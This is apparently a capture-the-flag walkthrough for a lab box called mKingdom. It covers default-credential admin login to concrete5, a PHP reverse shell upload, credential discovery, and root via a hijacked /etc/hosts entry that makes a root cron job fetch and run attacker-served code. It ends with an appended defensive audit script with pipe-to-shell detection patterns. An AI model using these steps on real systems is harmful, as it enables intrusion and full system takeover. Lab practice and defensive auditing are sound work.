mKingdom

Beginner-friendly box inspired by a certain mustache man.

Recon


RustScan

We begin by performing a port scan using RustScan, which reveals that only port 85 is open.

rustscan --ulimit 5000 --range 1-65535 -a machine_ip
RustScan results: Only port 85 detected as open.

Let's open this port in a web browser, as it might be running an HTTP service.

Accessing port 85 in the browser: Checking for HTTP service.

Since the page appears empty, let's proceed with content discovery using ffuf.

ffuf -u http://machine_ip:85/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100
Exploring content with FFUF tool

Let's investigate the contents of the "app" page to see what it contains.

Examining the contents of the 'app' page for clues

Inside, we find a button with JavaScript code designed to navigate us to the 'castle' page.

    <script>
        function buttonClick() {
            alert("Make yourself confortable and enjoy my place.");
            window.location.href = 'castle';
        }
    </script>

Upon accessing the castle page, we encounter a webpage titled "Toad's website."

Exploring 'Toad's website' after accessing the castle page.

Upon inspecting the webpage's source code, it appears to be running concrete5 CMS version 8.5.2.

Identifying concrete5 CMS version 8.5.2 from webpage source code.

After researching online for an exploit related to this version, I came across a HackerOne report that could be useful.

HackerOne report

The report indicates that administrator permissions are required, so we first need to find the login page and obtain administrator privileges. Scrolling down on Toad's page, we notice small text reading 'Log in', which is probably a link to the login page.

Spotting the 'Log in' option on Toad's page, potentially leading to the login interface.

Once we access the login page, we can attempt default credentials.

Exploring default credentials upon entering the login page.

Hooray! It's working!

administrator page

Shell as www-data

Now that we have administrator access, let's execute the exploit from the HackerOne report.

Steps To Reproduce

  1. Access the "System & Settings" option.

  2. Next, navigate to "Allowed File Types" under the Files section.

  3. Set the "File Extensions to Accept" field to only allow "php".

  4. Click on the Save button.

  5. Once saved, now visit the File Manager to upload the PHP shell.

Personally, I use the Firefox extension Hack-Tools to generate my PHP reverse shell.

Hack-Tools extension

Alternatively, you can utilize Pentestmonkey's PHP reverse shell.

  1. Upload your reverse shell file.

  2. After uploading the PHP reverse shell, simply click on "Close".

  3. Upon successful upload, you'll receive a completion message with the URL at which the uploaded shell can be reached.

  4. Before visiting the page, make sure to set up a netcat listener on the port specified in the PHP reverse shell.

That's it! Now we have a reverse shell as the www-data user!

Reverse Shell as www-data

Shell as toad

Before obtaining a shell as "toad," let's upgrade the shell using this command:

export TERM=xterm-256color;python3 -c "import pty;pty.spawn(\"/bin/bash\")"
Upgrading the shell

Now, we need to run linpeas.sh to search for any privilege escalation opportunities.

linPEAS banner

You can fetch the linPEAS script with this command:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O

We've discovered a password that may belong to 'toad'.

toad's password

Hooray! We've successfully accessed the 'toad' user account.

Shell as mario

After searching for some time for anything related to the 'mario' user, we came across a strange encoded string in toad's .bashrc.

strange base64 in .bashrc

After decoding it, we obtained some sort of password.

decoding the base64

It might be Mario's password. Let's give it a try!

Testing the decoded string as a potential password for Mario.

Wow, it worked! We now have access as the Mario user and we can get the user.txt flag.

what?! ..

Wait, why can't we 'cat' the user.txt? Oh, I see why: it's set with SUID permissions and Toad doesn't have access to it!

Solution

Any of these commands can display the contents of the user.txt file instead:

more
less
tail
head
vim
nano
nl
tac

Shell as root

After some searching, we discovered that we can modify the /etc/hosts file. But how could this be useful?

Let's run the pspy64 tool to check if there are any visible cron job commands.

pspy on GitHub

We see that root runs a bash script fetched from the website.

We've observed that the user root is executing a bash script from the website.

We can modify the /etc/hosts file to redirect the IP address of mkingdom.thm to our IP, enabling us to exploit this for a root shell.

First, execute this command on the target, replacing machine_ip with the IP of your own attacking machine (note that it overwrites the whole file, so mkingdom.thm now resolves to you):

echo 'machine_ip mkingdom.thm' > /etc/hosts

Next, on your attacking machine, create the directory path that root requests:

cd /tmp ; mkdir -p ./app/castle/application

Then serve that directory on port 85 so root's request reaches you:

python3 -m http.server 85

If you observe the requests, you're on the right track.

Next, write the script root will fetch into the path created above:

echo "chmod 4777 /bin/bash" > ./app/castle/application/counter.sh

Once root's request for counter.sh shows up in the Python server log, the script has run and you can get a root shell with this command:

bash -p
root.txt flag
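From the defender's side, the chain above works because a root cron job pipes a fetch by hostname into bash while /etc/hosts is writable by unprivileged users. This Python audit is an added example (not part of the original writeup): it flags cron commands that pipe fetched content into a shell, reports whether the fetched hostname is pinned in /etc/hosts, and checks the hosts file's mode bits; the cron line and hosts file it runs on are constructed samples.

```python
"""Audit for the root-escalation chain: a root cron job fetches a script by hostname
and pipes it into bash, while /etc/hosts is writable by unprivileged users.
Added example, not part of the original writeup; sample inputs are constructed."""
import re
import stat

# A fetch whose output is piped straight into a shell, e.g. "curl host/x.sh | bash"
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# Hostname of the URL that follows curl/wget (options such as -s or -qO- are skipped)
FETCH_HOST = re.compile(r"\b(?:curl|wget)\b(?:\s+-\S+)*\s+(?:https?://)?([^/:\s]+)")

def hosts_entries(text):
    """Parse /etc/hosts text into {hostname: ip}; the first entry for a name wins."""
    out = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        for name in fields[1:]:
            out.setdefault(name, fields[0])
    return out

def risky_cron_commands(cron_text, hosts):
    """Flag cron lines that pipe fetched content into a shell and report whether the
    fetched hostname is pinned in /etc/hosts (so a hosts edit redirects the fetch)."""
    findings = []
    for line in cron_text.splitlines():
        if not PIPE_TO_SHELL.search(line):
            continue
        m = FETCH_HOST.search(line)
        host = m.group(1) if m else None
        findings.append({"cron": line.strip(), "host": host,
                         "pinned_to": hosts.get(host)})
    return findings

def hosts_writable_by_others(mode):
    """True if the mode bits let group or others write /etc/hosts (the flaw on this box)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

# Constructed sample input mirroring the chain described in the writeup
SAMPLE_HOSTS = "127.0.0.1 localhost\n127.0.1.1 mkingdom.thm  # constructed\n"
SAMPLE_CRON = ("*/1 * * * * root curl mkingdom.thm:85/app/castle/application/counter.sh | bash\n"
               "0 3 * * * root /usr/bin/logrotate /etc/logrotate.conf\n")

if __name__ == "__main__":
    pinned = hosts_entries(SAMPLE_HOSTS)
    for f in risky_cron_commands(SAMPLE_CRON, pinned):
        print("pipe-to-shell cron:", f["cron"])
        print("  fetches from", f["host"], "pinned in /etc/hosts to", f["pinned_to"])
    print("/etc/hosts mode 0666 writable by others:", hosts_writable_by_others(0o666))
```

On a real host, feed it the contents of /etc/hosts and /etc/crontab (plus /etc/cron.d/*) and the result of os.stat("/etc/hosts").st_mode; a pinned hostname in a pipe-to-shell job combined with a writable hosts file is the exact condition exploited above.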
